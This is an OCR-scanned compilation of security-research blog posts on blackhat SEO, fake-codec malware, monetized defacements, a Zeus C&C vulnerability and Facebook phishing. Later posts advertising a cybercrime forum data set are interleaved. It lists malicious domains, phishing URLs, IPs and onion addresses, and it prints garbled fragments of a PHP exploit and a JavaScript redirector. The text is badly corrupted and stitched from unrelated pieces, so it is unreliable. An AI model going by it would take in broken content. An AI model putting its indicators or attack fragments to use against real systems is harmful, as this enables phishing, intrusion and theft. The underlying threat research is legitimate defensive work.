SHA1..: 4497715e0a365863d6ca41ab12254bf591118ed7 


Scanners result : 10/32 (31.25 %) 


SWF:CVE-2007-0071; Exploit:Win32/APSB08-11.gen!A 

File size: 593 bytes 

MD5...: 5b6b28d4de3df92f48fbe5e8bd565cda 

SHA1..: 3123d357d2080d1ee09ee67203275d51332e3397 
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The password stealer than connects to the C &C, from where an unknown for the time being 
number of campaigns are coordinated. What’s a useless virtual good such as passwords for 
MMORPGs for malware gangs aiming to steal Ebanking details through banking malware for 
instance, is [3]a precious and valuable good for others operating on the other side of the 
world, where a virtual item is [4]more expensive than access to an Ebanking account. 


1. http://sunbeltblog. blogspot .com/2008/06/dangerous- youtube- spoof .html 

2. http://ddanchev .blogspot .com/2008/05/malware-attack-exploiting-flash-zero.html 
3. http: //ddanchev. blogspot . com/2007/03/underground-economys-supply-of-goods .html 
4 


ttp://ddanchev. blogspot .com/2008/06/price-discrimination-in-market-for. html 
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4.6.8 Monetizing Web Site Defacements (2008-06-13 16:15) 


The Africa Middle Market Fund 


WELCOME TO the Africa Middle Market Fund 


The Africae Paddle Market Fund is 9 private captal fund that nwests in small and medium sized 
Afncan te estes wh eed fr 1s pte $26 


The Purpose of the Afreca Middle 
Market Feed is to enetle mvestors © 
At. 


What used to be a harmless web site defacements back in the old school days, is today’s 
ongoing monetization of defaced web sites, a logical development given the consolidation 
between different underground parties, evidence of which can be seen in the majority of 
incidents I’ve been analyzing recently. 


[1]The Africa Middle Market Fund’ site is the latest example of a web site defacer is abusing 
the access to the web server to generate and locally host blackhat SEO pages, which when 
once access only by searching for the keywords and consequently returning 404 if traffic isn’t 
coming from a search engine, redirect to known rogue security software, in this case, the 
[2]XP antivirus protection ( securityscannersite.com ) which you must be familiar with if you 
were following the [3]assessments of the [4]massive IFRAME SEO [5]poisoning attacks that 
took place during March this year. More about the found : 


"The Africa Middle Market Fund is a private capital fund that invests in small and medium 
sized African businesses who need from $500,000 up to $2 million to grow and succeed to 
their full potential. We are a "double bottom-line" or "impact investment" fund, meaning that 
we care equally about financial performance and social benefit. We are for-profit and insist on 
our investees employing world standards of financial and business management to maximize 
their chances of success " 
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The Africa Middle Market Fund - Home 

welcometo.jpg. The Africa Middle Market Fund is a private capital fund that invests in small 
and medium sized African businesses who need from $1 million up ... 

ww. africarnmfund.com/ - 8k - Cached - Similar pages - Note this 


mu sub 

mu sub, free download evox m7, Worms 4: Mayhem nocd, soft java C350, americas army 
downlad, Icq5 anti banner crack, serial key Super architect, ... 

africammfund. com/images/MU-SUB. html - 8k - Cached - Similar pages - Note this 


telecharger ps2 vgs 

telecharger ps2 vgs, beth nude bounty hunter, free sample stripsaver 2, xtm warez, Star WYars 
- Battlefront 2 key code, recovery download crack, ... 

africammfund. com/images/telecharger-ps2-vgs. html - 8k - Cached - Similar pages - Note this 


mp3 half life2 
mp3 half life2, serial Audio Hijack Pro 2.6, fontographer free download for windows, 666492. 
africammfund. com/images/mp3-half-life2. html - 8k - Cached - Similar pages - Note this 


rtvimir keys 

rivi mir keys, i need a diablo 2 code key, ghost 8 corporate warez, disable licence mp3, 
dowloand gta game pe FREE, excelfix key generate, ... 

africammfund. com/images/rtvi-mit-keys. html - 8k - Cached - Similar pages - Note this 


xara 3d keygenerator 
xara 3d keygenerator, plugin pqmagic pour bartpe, iView Media 1.3 crack, download Handy 
Zip for s60 free, world warcrit cheats free download, cracked power ... 


africammfund. com/images/xara-3d-keygenerator. html - 8k - Cached - Similar pages - Note this 


microlab x2 5.1 

microlab x2 5.1, dj sam keygen, download spyware doctor key gen, frozen throne v.1.10, 
motorola torrent 3.11, keygen para virtual pc para mac, ace-high mp3 ... 

africammfund. com/images/Microlab-X2-5. 1. html - 8k - Cached - Similar pages - Note this 


Most of the outgoing links from a sample of over 50 blackhat SEO pages at the site point 
to 23search.org , which is an invitation-only affiliate based network for traffic exchange, 
connecting different malicious parties together : 


" What is this site? This site helps webmasters to earn money with their sites. How it 
works? Our program generate traffic from search engines and display advertising. What shell 
| do to start with you? Signup, get php file from member area, put file into your website 
directory, modify or create .htaccess in the same directory, and receive money! " 


The session is then redirected to drivemedirect.com/soft.php?aid=0195 &d=3 &product=xXPA, 
as well as to drivemedirect.com/soft.php?aid=0263 &d=2 &product=XPC to ultimately redirect 
the user to online-xpcleaner.com/2/freescan.php?aid=880263 


Moreover, the majority of blackhat SEO campaigns are also starting to apply evasive tech- 
niques to make it harder to analyze them. In this particular campaign for instance, only traffic 
comming from search engines would get the chance to see the SEO page due to the use of 
document.referrer tags. Here are some sample monitization practices from what I’ve seen 
between the lines of recently defaced sites : 
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- installing web backdoors and reselling the access to phishers, spammers and malware 
authors who would have full control over the content, and can therefore do whatever they to 
with the web server 


- installing web based spamming tools that later on will be either used directly by the 
defacers, or access to the tools sold to those interested in using them 


- participating in an affiliate based blackhat SEO networks, where revenue coming of the 
victims w 


ho installed the rogue software is shared among the defacer and the affiliate based network, 
which doesn’t really care how and where is all the traffic coming from 


- forwarding the responsibility of hosting phishing pages to the legitimate site by hosting 
them locally in between sending the phishing emails again using the same host 


- selling the access by promoting it based on its page rank 
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Web site defacements in times when [6]traffic suppliers are efficiently coordinating cam- 
paigns with traffic seekers, will mature into a tool for providing malicious infrastructure on 
demand, just like botnets did. Then again, the endless possibilities provided by insecure web 
applications are already blurring the lines between web site defacements and SQL injections. 


Related posts: 

[7]Pro-Serbian Hacktivists Attacking Albanian Web Sites 
[8]The Rise of Kosovo Defacement Groups 

[9]A Commercial Web Site Defacement Tool 
[10]Phishing Tactics Evolving 

[11]Web Site Defacement Groups Going Phishing 
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4.6.9 Malicious Doorways Redirecting to Malware (2008-06-16 09:36) 
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Blacklisting malicious sites in times when legitimate ones are starting to compete with bogus 
.info and .biz ones for the leading position of hosting and serving malicious content, is a bit 
of an outdated and reactive approach for protecting against unknown threats. However, a 
single malicious domain whose live exploits can be easily detected and consequently blocked, 
is often just a front end to a large domains portfolio whose malicious content may easily 
pass through web filtering and on-the-fly malware attempts. Even worse, a malicious domain 
often exists in multiple "alternate realities" since a single IP is hosting many other unique and 
related malware domains. 


In this post, I'll assess [l]a misconfigured malicious doorway, that is redirecting to ten 
different malware sites [2]serving Zlob variants by delivering fake codecs that all the bogus 
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adult sites require. The doorway is misconfigured in the sense of not recording the IP and 
checking the cookie set, in comparrision to every average web malware exploitation kit out 
there, which will not serve anything malicious when accessed for a second time since it’s 
hashing the IPs that accessed it already. This is just the tip of the iceberg when it comes to 
the emerging evasive approaches applied to make the analysis of such doorways a bit more 
time and resources consuming. In a single sentence - there’s evidence blackhat SEO-ers are 
starting to exchange crawling manipulation know-how with malware authors . 
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Online Security Scanner requires Activex 
controts te repair your computer, 

To continue, chick the icon at top of pape 
and then chek BEinst if you 
Gon t see the icon at the top of the page, chck 


Get continuous protection 
> for your PC with Spy 
Shredder 


Oownioad Spy Shredder, anti-spyware 
se0 ve New comprehers 


Report: found spyware threat 


oh A CASE. rin dz 
) CoolWebSearch (CWS), wind2 
i) Transponder (vx2) 


oy Perfect Keylogger 
) Backdoor. Win32.1RCBot.ex ’ 


Spyware ammount: 5 


In this example we have bestxvids.info (87.118.116.11) which is reditecting to all-in 


dex.com/in.cgi?5 (87.118.116.11) a URL that’s been actively spammed across forums and 
guestbooks vulnerable to automatic posting vulnerabilities (weak CAPTCHAs and web appli- 
cation vulnerabilities) which is then redirecting to the following fake codec domains on the 
fly, and since the redirection script isn’t hashing my IP like the majority of well configured 
ones requiring the use of multiple IPs if we’re to expose all the campaigns, it makes the 
investigation easier : 


tubeuniverses.com/teen/index.php?id=1883 - (78.108.177.99) 
new-content-s2008.com/freemovie/938/0/ - (72.21.53.218) 
teens.Obucksforpornmovie.com/?id=4199 - (64.28.181.28) 
getadultaccess.com/movie/?aff=5310 - (200.63.46.84) 


hqtube.com/?7014000000 - (88.85.66.116) 
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supersharebox.com/softw/?aff=5310 &saff=0 - (200.63.46.84) 


scanner.shredderscan.com/5/?advid=4329 - (92.241.182.13) 


myflydirect.com/1/5310/ - (200.63.46.84) 


getadultaccess.com/movie/?aff=5310 - (200.63.46.84) 


hotvidstube.com/teen/index.php?id=1883 - (78.108.177.99) 


2008-adult-2008.com/freemovie/938/0/ - (72.21.53.218) 


s-soft08freeware.com/download/502/938/0 - (91.203.70.18) 
Where’s the "alternate reality"? All of the following fake codec and adult sites serving 


Zlob variants, with minor exceptions of course, are also responding to the main IP of the 
redirector - 87.118.116.11 : 
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carsfoto.ru 
cheapest-pharmacy.com 


coolsexmovies.net 


free-movie-xxx.net 
gold-collection.biz 
p-o-r-n-0.com 
p-o-r-n-0.info 
sexakaporn.com 
stred.biz 

stred.in 
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amazonfkuuy6g30u.onion 
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amputefruj4rzgz5.onion 
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anatisrfazyawxqv.onion 


animalirgsuecrvn.onion 
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anna4nvrvn6fgo6d.onion 
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cccenterse4ofwp6.onion 
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tosserhost.com 
west-video-xxx.info 
wowtofree. info 


Shall we also expose the entire scammy ecosystem of Zlob variants, 
the same netblocks in order to keep it simple? But of course : 


porn-youtube08.net 
sextubecodec55.com 


2008adult2008.com 


adultstreamportal2008.com 
newcontent-s2008.com 
adultxx-18.com 
newcontents2008.com 
onlinestreamvide.com 
2008adultstreamportal2008.com 


newcontents2008.com 


hot-pornotube2008.com 
adult-youtube-8.com 
2008adult-s2008.com 
2008adultstreamportal2008.com 


adult-freetube-8.com 


adult18tube2008.com 


adultstreamportal2008.com 


free-porntube-8.com 
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as always, sharing 
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The bottom line - malicious doorways are slowly starting to emerge thanks to the con- 
vergence of traffic redirection and management tools with web malware exploitation kits, and 
just like we’ve been seeing the adaptation of spamming tools and approaches for phishing 
purposes, next we’re going to see the development of infrastructure management kits, a 
feature that [3]DIY phishing kits are starting to take into consideration as well. 


1. http: //ddanchev. blogspot .com/2008/06/blackhat- seo-redirects-to-malware-and.htm 


2. http: //ddanchev. blogspot .com/2008/03/portfolio-of-fake-video-codecs.htm 


3. http: //ddanchev. blogspot .com/2008/05/diy-phishing-kits-introducing-new.htm 


4.6.10 The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
(2008-06-18 22:38) 
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ROM “users Dwhile|Smemysel fetch array[Siiivar_dump(3metj echo "MYSOLHOST: "MYSOL_HOST." MYSOLUSER: “MYSOL USER." MYSOLPASS™.MYSOL_PASS: unlink FiLe 
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Sstrien = strien[Sshell} 
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Slile = $be Mopenf hittey’.$ GETThest').80/7'.$ GET) Rak’)."s pip ?4:1£<=Setrienkp=text php’); 
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icose|Stile 


2 = mew Browser mulator|: 


> adéHenderLinefAccept Encoding”, “<compress; x zip} 
$be- Mopenf hiteyS_GETPhost').“80/"$ GET iat’) flestmainsl text phe" 
Sreeponse © $6e->gctlastflespemecHcaders! 


mer nannwe<de>™ 
hile [Siine gets [Siite. 1024) 
| echo Stine 


Just like you have sophisticated cyber criminals trying to scam wannabe cyber criminals by 
providing them with backdoored web malware exploitation kits and phishing pages, you have 
cyber criminals looking for ways to obtain access to the most popular exploitation kits and 
bankers malware C &Cs by finding vulnerabilities within them. 


Apparently, [1]Zeus, the crimeware kit which | discussed in a previous post, is suscepti- 
ble to a remotely exploitable vulnerability according to a proof of concept code | obtained 
recently . The vulnerability allows the injection of logins and passwords within any misconfig- 
ured web interface, due to the way in which Zeus is processing php scripts (web shells and 
backdoors) from the directory in which it stores the stolen data. Ironically, "Zeus users are 
advised to take care of their directory permissions, and forbid the execution of scripts from 
the folder holding all the encrypted stolen information". 
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Passrord 


The implications of this flaw are huge, since, what used to be the practice of hijacking 
someone’s misconfigured botnet a couple of years ago, is today’s hijacking of the malware 
Campaigns’s command and control interface, which on the majority of occasions is left 
accessible to everyone - including independent researchers and the security community. 


Picture the following situation - right before the Russian Business Network "disappeared", it 
[2]threatened to sue Spamhaus for blacklisting most of its old infrastructure, what would 
happen if the security community starts unethically pen-testing the RBN’s infrastructure, and 
remotely exploit misconfigured Zeus C &Cs in order to estimate the number of infected hosts 
and the type of stolen data in order to communite its findings to the appropriate parties on all 
fronts? If the RBN starts suing for getting unethically pen-tested, it would automatically claim 
ownership of, well, the Russian Business Network’s infrastructure which you must be pretty 
familiar with by now. 


Moreover, can we even dare to speculate on the existence of monoculture in crimeware 
software? You bet, and finding vulnerabilities within popular crimeware kits and web malware 
exploitation kits is only starting to emerge, a situation where the market share of a certain kit 
would attract the most vulnerability research. 


1. http://ddanchev. blogspot .com/2008/04/crimeware-in-middle-zeus.htm 
2. http: //www.wired.com/politics/security/news/2007/10/russian_network 
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warrenguyis3q3tw.onion 
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wywg65dio2lhe76z.onion 
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xsuee6v24g2q6phb.onion 
xuytcbrwbxbxwnbu.onion 
xvideos24y74huqj.onion 
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y5fmhyqdr6r7ddws.onion 
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z23z2xjhu36atreid.onion 
z52ncdpv3u5qc4hj.onion 
z57whuq7jaqgmhéd.onion 
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zeroerfjaacidxzf.onion 
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zionshopusn6nopy.onion 
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zkh6ony4pqf7ma5é6d.onion 
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zlal32teyptf4tvi.onion 
zlibraryexau2g3p.onion 
zloypbiqxyug4lok.onion 
zmjp5jp6dppdiz2a.onion 
zmodnpmgqs24fxntuewqpt4ohljwhdqaggdynzn3ytozbjye7g47sedqd.onion 
zmovietoropzaid3.onion 
zn4ei5n3xddb3otv.onion 
zocaloczzecchoaa.onion 
zoo6cxl4rtac3jxw.onion 
zootopiaakx4m57x.onion 
zpvluacf3b3cjxm7.onion 
zqiirytam276uogb.onion 
zqktlwi4fecvo6ri.onion 
zqktlwi4i34kbat3.onion 
zriokjwqb244oci7.onion 
zrwxcayqc4jgggnm.onion 
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zupyv3e5spdok6nw.onion 
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Z2Z2ZZZZzzzzaghsao.onion 


Stay tuned! 
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17.4.22 Two Factor Authentication Online E-Shop for Stolen Credit Cards Spotted in 
the Wild (2021-04-30 07:46) 


17.4.23 My Second Research Paper for WhoisXML API is now Live! (2021-04-30 07:47) 


17.5 May 


17.5.1 Five New White Papers for WhoisXML API Released Online! Grab a Copy To- 
day! (2021-05-01 05:27) 


w) 
Whois X{ViILAPI 


[1] 
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Dear blog readers, 


This is Dancho and | wanted to let everyone know that I’ve just released six new white papers 
and case studies on the topic of using Maltego in combination with [2]WhoisXML API for the 
purpose of mapping and doing reconnaissance of fraudulent and malicious online infrastructure 


used by cybercriminals. 
Find below the actual copies: 


- [3]Profiling a Money Mule Recruitment Registrant Emails Portfolio - An Analysis 


- [4]Profiling a Rogue Fast-Flux Botnet Infrastructure That’s Currently Hosting Multiple Online 


Cybercrime Enterprises - An Analysis 


- [5]Profiling the “Jabber ZeuS” Rogue Botnet Enterprise - An Analysis 


- [6JExposing a Fraudulent Boutique and Rogue Cybercrime-Friendly Forum Community - An 


Analysis 


- [7]Exposing a Rogue Domain Portfolio of Fake News Sites - An Analysis 


[8] 


® 


© 


Sample Screenshot of a well known money mule recruitment domain registrant 


[9] 
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4.6.11 Fake Celebrity Video Sites Serving Malware (2008-06-20 13:06) 
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With [1]blackhat search engine optimization tactics clearly converging with social engineering, 
the result of which is the increasing supply of Zlob malware variants served as fake codecs, it’s 
about time we spill some coffee on several campaigns in order to get a better understanding 
of the way the campaigns function. 


These campaigns are also starting to get so sophisticated, that analyzing a single one will 
expose another massive SQL injection, reveal several blackhat SEO domain farms, let you 
obtain fresh Zlob malware variants, and point you to the very latest and undetected rogue 
software if you manage to expose the entire scammy ecosystem through all the redirections 
put in place to make it harder to get to the bottom of it. 
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Sample screenshot of the Hilary Kneber Botnet in action 


Stay tuned! 
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17.5.2 Cybercrime Forum Data Set for 2021! - Special Easter Discount - Grab a Copy 
Today! (2021-05-04 06:19) 
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[1] 


GYBERCRIME > 
FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


Dear blog readers, 


This is Dancho and | wanted to let everyone know that due to popular demand for my Cy- 
bercrime Forum Data Set for 2021 I’m currently offering it full access for $200 for research 
purposes. 


Sample screenshots of some of the cybercrime-friendly forums included in the Data Set: 
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CELEBRITIES 
MOVIES 
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What’s important to keep in mind when assessing and shutting down such comprehensive 
campaigns is that on the majority of occassions the front end domains as well as the secondary 
ones are all attempting to download the codecs from hardcoded locations. Consequently, you 
have 50 front end domains and another 50 as secondary redirection points all attempting to 
download the codecs from 3 download locations. Once again, the malware authors efficiency 
centered mentality emphasising on the easy of management for the campaign is making it 
possible to. 


Here’s are some currently active fake celebrity video sites serving malware including the 
codec redirectors : 
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Sample Keywords Distribution: 
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Distribution of keywords (No of Cases) 
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Distribution of keywords (Frequency) 


Sample Forums in 
evilhack.ru.rar 
gerki.pw.rar 
ProLogic.rar 
SEOForum.rar 
c-cracking.org.rar 


Distribution of keywords (Frequency) 


CISCO 2.1 
PROXY 2,1% 2.1% nPo 23% 


IM 19 
inion gfe . CTUNNEP 2.2% 
DDOS 1,9% y ONYPUNKA 2,3% 
PRICE 1.7% ORIGIN 2.3% 


AMEX 2,4% 
CNOMNEP 2,6% 


YOUTUBE 1,7% 4 
CKPMNTMHE 1.7% Ze 


BITCOIN 1,7% 
PAYMENT 1,7% ONYPEPSI 2.7% 
WEBMONEY 1,7% 

AKKAYHTA 1.7% CNAMEPH! 2,7% 
MAPCEP 1,6% werent 
TPAQUK 1.6% 

noah can ” ESTER 05% 
CAM 1.6% Abe 
AMAZON 1,6% ROPYESTS 0, 
TOBAPOB 1.6% MERABSEBISID, 9% 
CEPBEPA 1.5% DERROT REND AGE: 0,9% 
Yu3BUMOCTb 1.5% Y NPSVIPYEEI 09% 
. SSH 1,4% veneSSAAR 97% 
gy Ey CLOUDRABROAT#G1.1% 
aackengal PACCBINKA GEPBUCOB 1,1% 
’ DIOKYMEHTb! 1.2% 


cluded in the Data Set: 
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Whitehat.vn.rar 
neadekvat.ru.rar 
www.opensc.ws.rar 
gofuckbiz.com.rar 
Darkode.rar 
hackademics.fr.rar 
darkmoney.de.rar 
xaker.name.rar 
Xakep.bg.rar 
sysadmins.ru.rar 
PhreakerPro.rar 
Master-X.rar 
Chf.rar 
Darkmarket.la.rar 
Webmasters.ru.rar 
reversing.cc.rar 
monopoly.ms.rar 
Exelab.rar 
blacktip.top.rar 
ghostmarket.net.rar 
DomenForum.rar 
Antichat.ru.rar 
Hack-Port.rar 
ProxyBase.rar 
replace.org.ua.rar 
Eviloctal.rar 
Xakepok.rar 
WWH-Club.rar 
Szuwi.rar 
GoFuckBiz.rar 
www.forohack.com.rar 
Promarket.rar 
pay-per-install.org.rar 
LinkFeed.rar 
TotalBlackhat.rar 
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Mr11-11mr.7olm.org.rar 
iFud.rar 
Piratebuhta.pw.rar 
BPCForum.rar 
ForumSEO.rar 
Cracked.to.rar 
Forum. Zloy.bz.rar 
ProCrd.rar 
Crack-Forum.rar 
alligator.cash.rar 
Mmpg.ru.rar 
MaulTalk.rar 
ForumSape.rar 
SEOCafe.rar 
dwh.su.rar 
BigFozzy.rar 
Gla.vn.rar 
Zismo.rar 
it-24h.com.rar 
Forum-UINSell.rar 
carderplanet.rar 
4HatDay.rar 
Toolbabase.se.rar 
ubotstudio.com.rar 
aHack.rar 
Linuxac.org.rar 
imhatimi.org.rar 
Svuit.vn.rar 
Free-hack.rar 
xaknet.org.rar 
www.ryan1918.com.rar 
Darkmoney.rar 
shadowcrew-2.rar 
Hackersoft.rar 
BlackhatWorld.rar 
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Nullnoss.org.rar 
365Exe.rar 

Aljyyosh.rar 
forum.cybsecgroup.com.rar 
Hackingboard.rar 
Szenebox.rar 

Cardvilla.rar 

iHonker.rar 

SkyFraud.rar 
H4kurd.com.rar 
moneymaker.hk.rar 
CNSec.rar 

Cyberizm.rar 
Turkhackteam.rar 
forum.reverse4you.org.rar 
CNHonker.rar 
security-teams.net.rar 
itsobr.com.rar 
Spyhackerz.rar 
ArmadaBoard.rar 
iransec.net.rar 
xaker26.info.rar 
11Wang.rar 

Hackings.rar 

Drop me a line at dancho.danchev@hush.com in case you’re interested. 


Stay tuned! 


1. https://1h3.googleusercontent .com/-8HS765n95gk/YJDLVT7 wKHI/AAAAAAAAM50/-TTQavbA9j sIwg1_6sOsGCHrWD7FH8KqgC. 
cBGAsSYHQ/s1600/1620101971755638-0. png 


17.5.3 Exposing Iran-based Hackers and Web Site Defacement Group’s Personal 
Web Sites Portfolio - Direct Technical Collection Download! Grab a Copy To- 
day! - Part Two (2021-05-24 04:02) 


[1] 
15788 


Dear blog readers, 


I’ve recently changed the actual download locations for two of the "Iran-based Hackers and Web 
Site Defacement Group’s Personal Web Sites Portfolio - Direct Technical Collection Download" 
file archives where you can actually go through some of the entire content portfolio on a huge 
number of currently active Web sites belonging to Iran-based hacking groups including lone 
hackers posted [2]here including [3]here. 


Grab a free copy of the original research [4]here including the second part [5]here. 
Part 01 - Download [6]here 
Part 02 - Download [7]here 
Check out the actual document [8]here. 
Sample photos include: 
[9] 
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IP Address Host Name 


149,156 alreadynude.com 


alreadynude.com 
funkytube. net 
alreadynude.com 
yetmorefun.net 
yetmorefun.net 
alreadynude.com 
alreadynude.com 
yetmorefun.net 
alreadynude.com 
tmz-video.com 


moviecity.se 
gossip-ster2.com 
tmz-video.com 
js0.info 


blog-x.in 


tmz-video.com 
funkytube.net 
tbvideo.notiong.com 
gossip-starz.com 
flaxxvid.com 
funkytube.net 
tmz-video.com 


yetmorefun.net 
alreadynude.com 
alreadynude.com 
alreadynude.com 
alreadynude.com 
tmz-video.com 
alreadynude.com 
alreadynude.com 


tmz-video.com 


stillnaked.net 
funkytube.net 


starvid.info 
yetmorefun.net 
hotnudity.net 
alreadynude.com 
celebvids.info 
sexystar.name 
hotserved.net 
1582 


Original Name 
stillnaked.net 
mandy. popvids. info 
Funkytube.net 
starvid info 
yetmorefun.net 
hotnudity.net 
alreadynude,.com 
celebvids.info 
sexystar.name 


hotserved.net 


gottabigfuic 
ty.se 
p-star2.com 
eo,com 


js0. info 


superfakamyvideo.corn 


hdavidz.com 
blog-x.in 
Em2-video.com 
newhotpeople.com 
notlong.corn 


xxvid.com 
videoid. info 
realvideofree,com 
Frc-online.corm 


yetmorefun.net 


jodie. popvids. info 


[14] 
15794 


[15] 


15795 


[16] 


15796 


[17] 


15797 


HaPPY Bivthde¥ Behrooz 


[18] 
15798 


[19] 


T5799 


[20] 


15800 


thestars2008.com 


nudde.net 
gottabigfuick.com 
moviecity.se 
gossip-starz.com 


tmz-video.com 


jsO.info 
superfakamyvideo.com 
hdavidz.com 


blog-x.in 
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[24] 
15804 


[25] 


15805 


[26] 


15806 


[27] 


15807 


[28] 


15808 


[29] 


15809 


tmz-video.com 
newhotpeople.com 
dirty-gossips.com 
flaxxvid.com 
videoid.info 
realvideofree.com 
yetmorefun.net 


popvids.info 
ihavewetfuckpussy.com 


virus-scanonline.com 
adultx2008.com 


lux-software2008.com 


As well as some sample subdomains for traffic acquisition purposes, since all of these 
have already been crawled by search engines : 


jodie. popvids.info 
jessica.popvids.info 


tila.popvids.info 


paris.celebvids.info 

vanessa.celebvids.info 

britney.nudde.net 

paris.nudde.net 

kardashian.nudde.net 

vanessahudgens.yetmorefun.net 

lindsaylohan.yetmorefun.net 

britneyspears.yetmorefun.net 

parishilton.yetmorefun.net 

kardashian.nudde.net 

We also have embedded IFRAMEs and as well as injected ones into vulnerable sites, acting as 
redirectors to some of these fake video sites. For instance, at the pedophilesexstories.blog.com 


we have an injected redirector - jsO.info/?s=16 &k=pedophile+sex+stories &c=5 and jsO.info 
itself is a blackhat SEO operation that’s aggregating generic search traffic like this : 
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[34] 
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[35] 
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[36] 


15816 


[37] 
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[38] 
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[39] 


15819 


jsO.info/16/5/ragnarok+hentai 
jsO.info/15/4/antivirus+characteristic 


js0.info/16/5/msn+monkey 


jsO.info/15/4/airplus+internet+security 


chtab 
<bedy omload+"fr. pabeit() 27> 


SORES EIGEN (SENG Sela St Slarrtaria’ tetatelctetetela'eotein'+! etter le! "eimieteleitieth! 


vor pe + pe[l).spls 
pe(O) * pe(O).splat 
peti) = pe(i).spiat 
peti) « pe[i).ceplace( 
pet) « 


o 4. 
So+-pe[0)+"sparametere"+ }) +" eure 1sTTP_PEFERER«"+encodeURI Component (document, referrer)+"ece'+pr[2}z 


document. getElementById(‘'fr').action-se: 
</ectipt> 
<feedy> 
</ttab 


Once accessed, you get redirected to through [2]two separate redirection campaigns at 
searchaw.info/sa/in.cgi?16 ; and hmel.info/stds13/go.php , until you finally get to the codecs. 


With blackhat SEO-ers already well developed inventory of topical junk content, and ex- 
perience in what’s popular content and what’s not, the entry barriers for malware authors into 
the traffic acquisition joys of blackhat SEO has never lower. 


1. http: //ddanchev. blogspot .com/2008/06/blackhat-seo-redirects-to-malware-and.htm 


2. http: //ddanchev. blogspot .com/2008/06/malicious-doorways-redirecting-to.htm 


4.6.12 Phishing Campaign Spreading Across Facebook (2008-06-20 19:36) 


Host URL Body  Contert-T... 


Facebooksindex.phptid=sivSpew 


wee. Facebook. com. profile.id.ingt $frSn.mg6qdo.e77¢96037 .com fcssiie?.css70:99961 209 ~—stext shim; « 
wrew facebook. com. profiie.sd int 9frSn.mg6qdo.077°96037.com fopensearch_desc.xmi?0:727379 217 ~—stextihand; « 
www. facebook. com profile id .mgtSfrSe.mg6qdo.e77¢S8037.com ffacebook/login.php 0 text/henl; c... 


Phishers have once again indicated their interest in obtaining fresh passwords for social 
networking sites, by using the already hacked accounts there in order to social engineer the 
account holder’s friends that the phishing links they leave as comments are legitimate. This 
latest [1]internal phishing campaign circulating across Facebook, is a part of a bigger phishing 
operation, whose reliance on fast-fluxed domains used in the campaign indicates it’s a part of 
a botnet. 
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[43] 
15823 


[44] 
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ainvashiyane.ir 


[46] 
15825 


[47] 
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[49] 
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[52] 
15831 


[53] 


15832 


Sample messages spammed across Facebook : 


"hey, howdy?? oh lisen i got a new friend here shex kinda new on facebook..maybe 
you Can give her a lil tym so she can enjoy here?? not forcin u but u can chk out =) " 


"ij got a new friend here..shex kinda new here..maybe you can give her a lil tym so she 
can enjoy here?? not forcin u but u can chk out =)...her profile is " 


"hi, watsup?? luk i want you to add ma new friend, as she is new here maybe you can 
give her lil time so she enjoys her online stay :P her profile is " 


Sample phishing URLs and fast-flux domains from this campaign : 


- facebook.com.profile.id.ep7vu2.749e92q. 916ad771.info /facebook/index.php?id=f543li- 
12 


- facebook.com.profile.id.mgt9fr5n.mg6qdo. e77c98037.com /facebook/index.php?id=sjv5p- 
pwqb &auth=5086550 &cyua=dm2yozoq3y 


- facebook.com.profile.id.bvou38.krpz. dortos.net /facebook/index.php?id=y39zjy4c6 
&auth=462 &cyua=2wr8tckkg8 


- facebook.com.profile.id.10g10th3.7q342k8. 31dd6db6.com /facebook/index.php?id=b36a7- 
sh7 &auth=bnspa &cyua=31064jrv8u2 
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[54] 
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[55] 
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[56] 


15835 
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[57] 
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[61] 
15840 


[62] 


15841 


[63] 


15842 


1d27c9b8fb.com 
31dd6db6.com 
dortos.net 
e77c98037.com 
916ad771.info 


3idd6db6,com 
dortos. 
31ddéx 


31dd6db6.com 
3iddédb6,com 
31dd6db6,com 
3idd6db6.com 
3idd6db6.com 
3idd6db6.com 
3idd6db6,com 
31iddédb6 

3idd6db6,com 


e77rosn37 


om 


e77c98037.com 


31dd6db6.com 


dortos,net 


31idd6db6, 
31idd6db6,com 
3iddédb6,com 
3iddédb6,com 
3idd6db6.com 
3iddédb6,com 
3idd6db6 
3iddéd 


dortos,net 
dortos.net 
dortos.net 


dortos.net 


Related phishing domains sharing fast-flux infrastructure with one another : 


paypal.client-confirmation.com 
acznc84.com 


ccitu938.com 


e77c98037.com 


[64] 


15843 


[65] 


15844 


[66] 


15845 


[67] 


15846 


[71] 
15850 


[72] 


15851 


[73] 


15852 


ccitu938.com 
civvi05.com 
client29184146.com 
cnzu390.com 
d71ladb12.com 
dd25d624.com 


f009c270.com 
fzkgoo6.com 
lvozx90.com 
r8tOp0l4.net 
2j1f.com 
31c5f18a7f.com 
3h8ax3.com 
4442852.com 
47cx972x.com 
72195e6.info 
aur83jf82la.com 


f80a5b31be7.com 
gllofj8532.com 
3h8ax3.com 
47cx972x.com 
aur83jf82la.com 
clientl874741.com 
clientl929848.com 
client9994414.com 


ringbe.com 
ringbean.com 


ringwe.com 


xctiw4.com 


They also seem to be in a process of diversifying the social networks to be attacked, 
having Hi5 in mind - hi5.com.profile.id.yijs.dcrt. 1d27c9b8fb.com /hi5/?id=chrislef &auth=rwx 
&cyua=albumem 
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[74] 


15853 


[75] 


15854 


[76] 


15855 


[77] 


15856 


[81] 
15860 


[82] 


15861 


[83] 


15862 


Related posts: 


[2]Large Scale MySpace Phishing Attack 


[3]Update on the MySpace Phishing Campaign 


[4]MySpace Phishers Now Targeting Facebook 


[5]MySpace Hosting MySpace Phishing Profiles 


1, ft tp:/ blogs net. con/socurity/7p-1808 
2. http: //ddanchev. blogspot . com/2007/11/large-scale-myspace-phishing-attack. html 
3, http://ddanchev blogspot. con/2007/12/update~on-nyspace-phishing- campaign. html 
4. i - i . 
5. i 


ttp://ddanchev. blogspot .com/2008/01/myspace-phishers-now-targeting-facebook.htm 


ttp://ddanchev.blogspot.com/2008/05/myspace-hosting-myspace-phishing. html 


4.6.13 Underground Multitasking in Action (2008-06-23 14:07) 


22-06-2008 O28 it { it 
#e safe_mode PHO version: 5.2.8 GIRL: ON MySQL: ON SESQL 


t 


Dirable functions | NONE 


Free apace | 314.04 6 Total pace: 456.07 G8 


48312303 
506127 


3) drwer-xr-x 


if 


it 


it | 
Postgres Qe Cvade 


6 Jun 20 15:57 
96 May 30 15:28 


96 May 29 04146 9123 
96 May 28 OF:142 9545 


